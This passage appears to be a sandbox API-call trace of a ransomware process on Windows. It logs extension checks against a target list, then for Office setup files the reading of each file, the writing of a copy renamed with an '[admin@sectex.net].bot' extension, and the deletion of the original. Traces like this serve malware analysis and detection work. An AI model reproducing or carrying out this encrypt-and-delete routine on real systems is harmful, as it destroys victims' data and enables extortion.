	[0036.811] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104
	[0036.811] lstrlenW (lpString=".dbf") returned 4
	[0036.811] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0036.812] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104
	[0036.812] lstrlenW (lpString=".1cd") returned 4
	[0036.812] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0036.812] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104
	[0036.812] lstrlenW (lpString=".jpg") returned 4
	[0036.812] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0036.812] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104
	[0036.812] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104
	[0036.812] lstrlenW (lpString=".doc") returned 4
	[0036.812] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0036.812] lstrlenW (lpString=".docx") returned 5
	[0036.812] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1
	[0036.812] lstrlenW (lpString=".pdf") returned 4
	[0036.812] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0036.812] lstrlenW (lpString=".xls") returned 4
	[0036.812] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0036.812] lstrlenW (lpString=".xlsx") returned 5
	[0036.812] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1
	[0036.812] lstrlenW (lpString=".ppt") returned 4
	[0036.812] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0036.812] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104
	[0036.812] lstrlenW (lpString=".zip") returned 4
	[0036.812] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0036.812] lstrlenW (lpString=".rar") returned 4
	[0036.812] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0036.812] lstrlenW (lpString=".bz2") returned 4
	[0036.812] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0036.812] lstrlenW (lpString=".7z") returned 3
	[0036.812] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0036.812] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104
	[0036.812] lstrlenW (lpString=".dbf") returned 4
	[0036.812] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0036.812] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104
	[0036.812] lstrlenW (lpString=".1cd") returned 4
	[0036.813] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0036.813] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML") returned 104
	[0036.813] lstrlenW (lpString=".jpg") returned 4
	[0036.813] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0036.813] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0036.813] lstrlenW (lpString="SETUP.XML") returned 9
	[0036.813] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc
	[0037.659] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=2296) returned 1
	[0037.660] CloseHandle (hObject=0x1bc) returned 1
	[0037.660] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml")) returned 0x20
	[0037.660] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0037.660] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc
	[0037.660] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0037.660] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0037.660] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0037.747] GetLastError () returned 0x0
	[0037.747] ReadFile (in: hFile=0x1bc, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x8f8, lpOverlapped=0x0) returned 1
	[0037.854] WriteFile (in: hFile=0x1b8, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x900, lpOverlapped=0x0) returned 1
	[0037.855] ReadFile (in: hFile=0x1bc, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0037.855] WriteFile (in: hFile=0x1b8, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0037.855] SetEndOfFile (hFile=0x1b8) returned 1
	[0037.855] CloseHandle (hObject=0x1b8) returned 1
	[0037.856] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0037.856] SetEndOfFile (hFile=0x1bc) returned 1
	[0037.857] CloseHandle (hObject=0x1bc) returned 1
	[0037.857] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0037.857] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml")) returned 1
	[0037.858] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101
	[0037.858] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101
	[0037.858] lstrlenW (lpString=".doc") returned 4
	[0037.858] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0037.858] lstrlenW (lpString=".docx") returned 5
	[0037.858] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1
	[0037.858] lstrlenW (lpString=".pdf") returned 4
	[0037.858] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0037.858] lstrlenW (lpString=".xls") returned 4
	[0037.858] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0037.858] lstrlenW (lpString=".xlsx") returned 5
	[0037.858] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1
	[0037.858] lstrlenW (lpString=".ppt") returned 4
	[0037.858] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0037.858] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101
	[0037.858] lstrlenW (lpString=".zip") returned 4
	[0037.858] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0037.858] lstrlenW (lpString=".rar") returned 4
	[0037.858] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0037.858] lstrlenW (lpString=".bz2") returned 4
	[0037.858] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0037.858] lstrlenW (lpString=".7z") returned 3
	[0037.858] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0037.858] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101
	[0037.858] lstrlenW (lpString=".dbf") returned 4
	[0037.858] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0037.858] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101
	[0037.858] lstrlenW (lpString=".1cd") returned 4
	[0037.858] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0037.858] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101
	[0037.858] lstrlenW (lpString=".jpg") returned 4
	[0037.858] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0037.859] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101
	[0037.859] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101
	[0037.859] lstrlenW (lpString=".doc") returned 4
	[0037.859] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0037.859] lstrlenW (lpString=".docx") returned 5
	[0037.859] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1
	[0037.859] lstrlenW (lpString=".pdf") returned 4
	[0037.859] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0037.859] lstrlenW (lpString=".xls") returned 4
	[0037.859] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0037.859] lstrlenW (lpString=".xlsx") returned 5
	[0037.859] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1
	[0037.859] lstrlenW (lpString=".ppt") returned 4
	[0037.859] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0037.859] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101
	[0037.859] lstrlenW (lpString=".zip") returned 4
	[0037.859] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0037.859] lstrlenW (lpString=".rar") returned 4
	[0037.859] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0037.859] lstrlenW (lpString=".bz2") returned 4
	[0037.859] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0037.859] lstrlenW (lpString=".7z") returned 3
	[0037.859] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0037.859] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101
	[0037.859] lstrlenW (lpString=".dbf") returned 4
	[0037.859] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0037.859] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101
	[0037.859] lstrlenW (lpString=".1cd") returned 4
	[0037.859] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0037.859] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101
	[0037.859] lstrlenW (lpString=".jpg") returned 4
	[0037.859] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0037.860] lstrcmpiW (lpString1=".CHM", lpString2=".bot") returned 1
	[0037.860] lstrlenW (lpString="SETUP.CHM") returned 9
	[0037.860] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0037.915] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=67190) returned 1
	[0037.915] CloseHandle (hObject=0x1b4) returned 1
	[0037.916] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm")) returned 0x20
	[0037.916] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0037.916] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0037.916] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0037.916] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0037.916] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4
	[0037.916] GetLastError () returned 0x0
	[0037.916] ReadFile (in: hFile=0x1b4, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x10676, lpOverlapped=0x0) returned 1
	[0037.964] WriteFile (in: hFile=0x1c4, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x10680, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x10680, lpOverlapped=0x0) returned 1
	[0037.966] ReadFile (in: hFile=0x1b4, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0037.966] WriteFile (in: hFile=0x1c4, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0037.966] SetEndOfFile (hFile=0x1c4) returned 1
	[0037.967] CloseHandle (hObject=0x1c4) returned 1
	[0037.969] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0037.969] SetEndOfFile (hFile=0x1b4) returned 1
	[0037.971] CloseHandle (hObject=0x1b4) returned 1
	[0037.971] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0037.971] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm")) returned 1
	[0037.971] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102
	[0037.971] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102
	[0037.971] lstrlenW (lpString=".doc") returned 4
	[0037.971] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1
	[0037.971] lstrlenW (lpString=".docx") returned 5
	[0037.971] lstrcmpiW (lpString1=".docx", lpString2="P.CHM") returned -1
	[0037.971] lstrlenW (lpString=".pdf") returned 4
	[0037.971] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1
	[0037.971] lstrlenW (lpString=".xls") returned 4
	[0037.971] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1
	[0037.971] lstrlenW (lpString=".xlsx") returned 5
	[0037.972] lstrcmpiW (lpString1=".xlsx", lpString2="P.CHM") returned -1
	[0037.972] lstrlenW (lpString=".ppt") returned 4
	[0037.972] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1
	[0037.972] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102
	[0037.972] lstrlenW (lpString=".zip") returned 4
	[0037.972] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1
	[0037.972] lstrlenW (lpString=".rar") returned 4
	[0037.972] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1
	[0037.972] lstrlenW (lpString=".bz2") returned 4
	[0037.972] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1
	[0037.972] lstrlenW (lpString=".7z") returned 3
	[0037.972] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1
	[0037.972] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102
	[0037.972] lstrlenW (lpString=".dbf") returned 4
	[0037.972] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1
	[0037.972] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102
	[0037.972] lstrlenW (lpString=".1cd") returned 4
	[0037.972] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1
	[0037.972] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102
	[0037.972] lstrlenW (lpString=".jpg") returned 4
	[0037.972] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1
	[0037.972] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102
	[0037.972] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102
	[0037.972] lstrlenW (lpString=".doc") returned 4
	[0037.972] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1
	[0037.972] lstrlenW (lpString=".docx") returned 5
	[0037.972] lstrcmpiW (lpString1=".docx", lpString2="P.CHM") returned -1
	[0037.972] lstrlenW (lpString=".pdf") returned 4
	[0037.972] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1
	[0037.972] lstrlenW (lpString=".xls") returned 4
	[0037.972] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1
	[0037.972] lstrlenW (lpString=".xlsx") returned 5
	[0037.972] lstrcmpiW (lpString1=".xlsx", lpString2="P.CHM") returned -1
	[0037.972] lstrlenW (lpString=".ppt") returned 4
	[0037.972] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1
	[0037.973] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102
	[0037.973] lstrlenW (lpString=".zip") returned 4
	[0037.973] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1
	[0037.973] lstrlenW (lpString=".rar") returned 4
	[0037.973] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1
	[0037.973] lstrlenW (lpString=".bz2") returned 4
	[0037.973] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1
	[0037.973] lstrlenW (lpString=".7z") returned 3
	[0037.973] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1
	[0037.973] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102
	[0037.973] lstrlenW (lpString=".dbf") returned 4
	[0037.973] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1
	[0037.973] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102
	[0037.973] lstrlenW (lpString=".1cd") returned 4
	[0037.973] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1
	[0037.973] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM") returned 102
	[0037.973] lstrlenW (lpString=".jpg") returned 4
	[0037.973] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1
	[0037.973] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0037.973] lstrlenW (lpString="SETUP.XML") returned 9
	[0037.973] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0038.664] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=2362) returned 1
	[0038.664] CloseHandle (hObject=0x1a0) returned 1
	[0038.664] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml")) returned 0x20
	[0038.664] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0038.665] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0038.665] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0038.665] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0038.665] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0038.665] GetLastError () returned 0x0
	[0038.665] ReadFile (in: hFile=0x1a0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x93a, lpOverlapped=0x0) returned 1
	[0038.667] WriteFile (in: hFile=0x1c0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x940, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x940, lpOverlapped=0x0) returned 1
	[0038.668] ReadFile (in: hFile=0x1a0, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0038.668] WriteFile (in: hFile=0x1c0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0038.668] SetEndOfFile (hFile=0x1c0) returned 1
	[0038.668] CloseHandle (hObject=0x1c0) returned 1
	[0038.669] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0038.669] SetEndOfFile (hFile=0x1a0) returned 1
	[0038.669] CloseHandle (hObject=0x1a0) returned 1
	[0038.670] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0038.670] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml")) returned 1
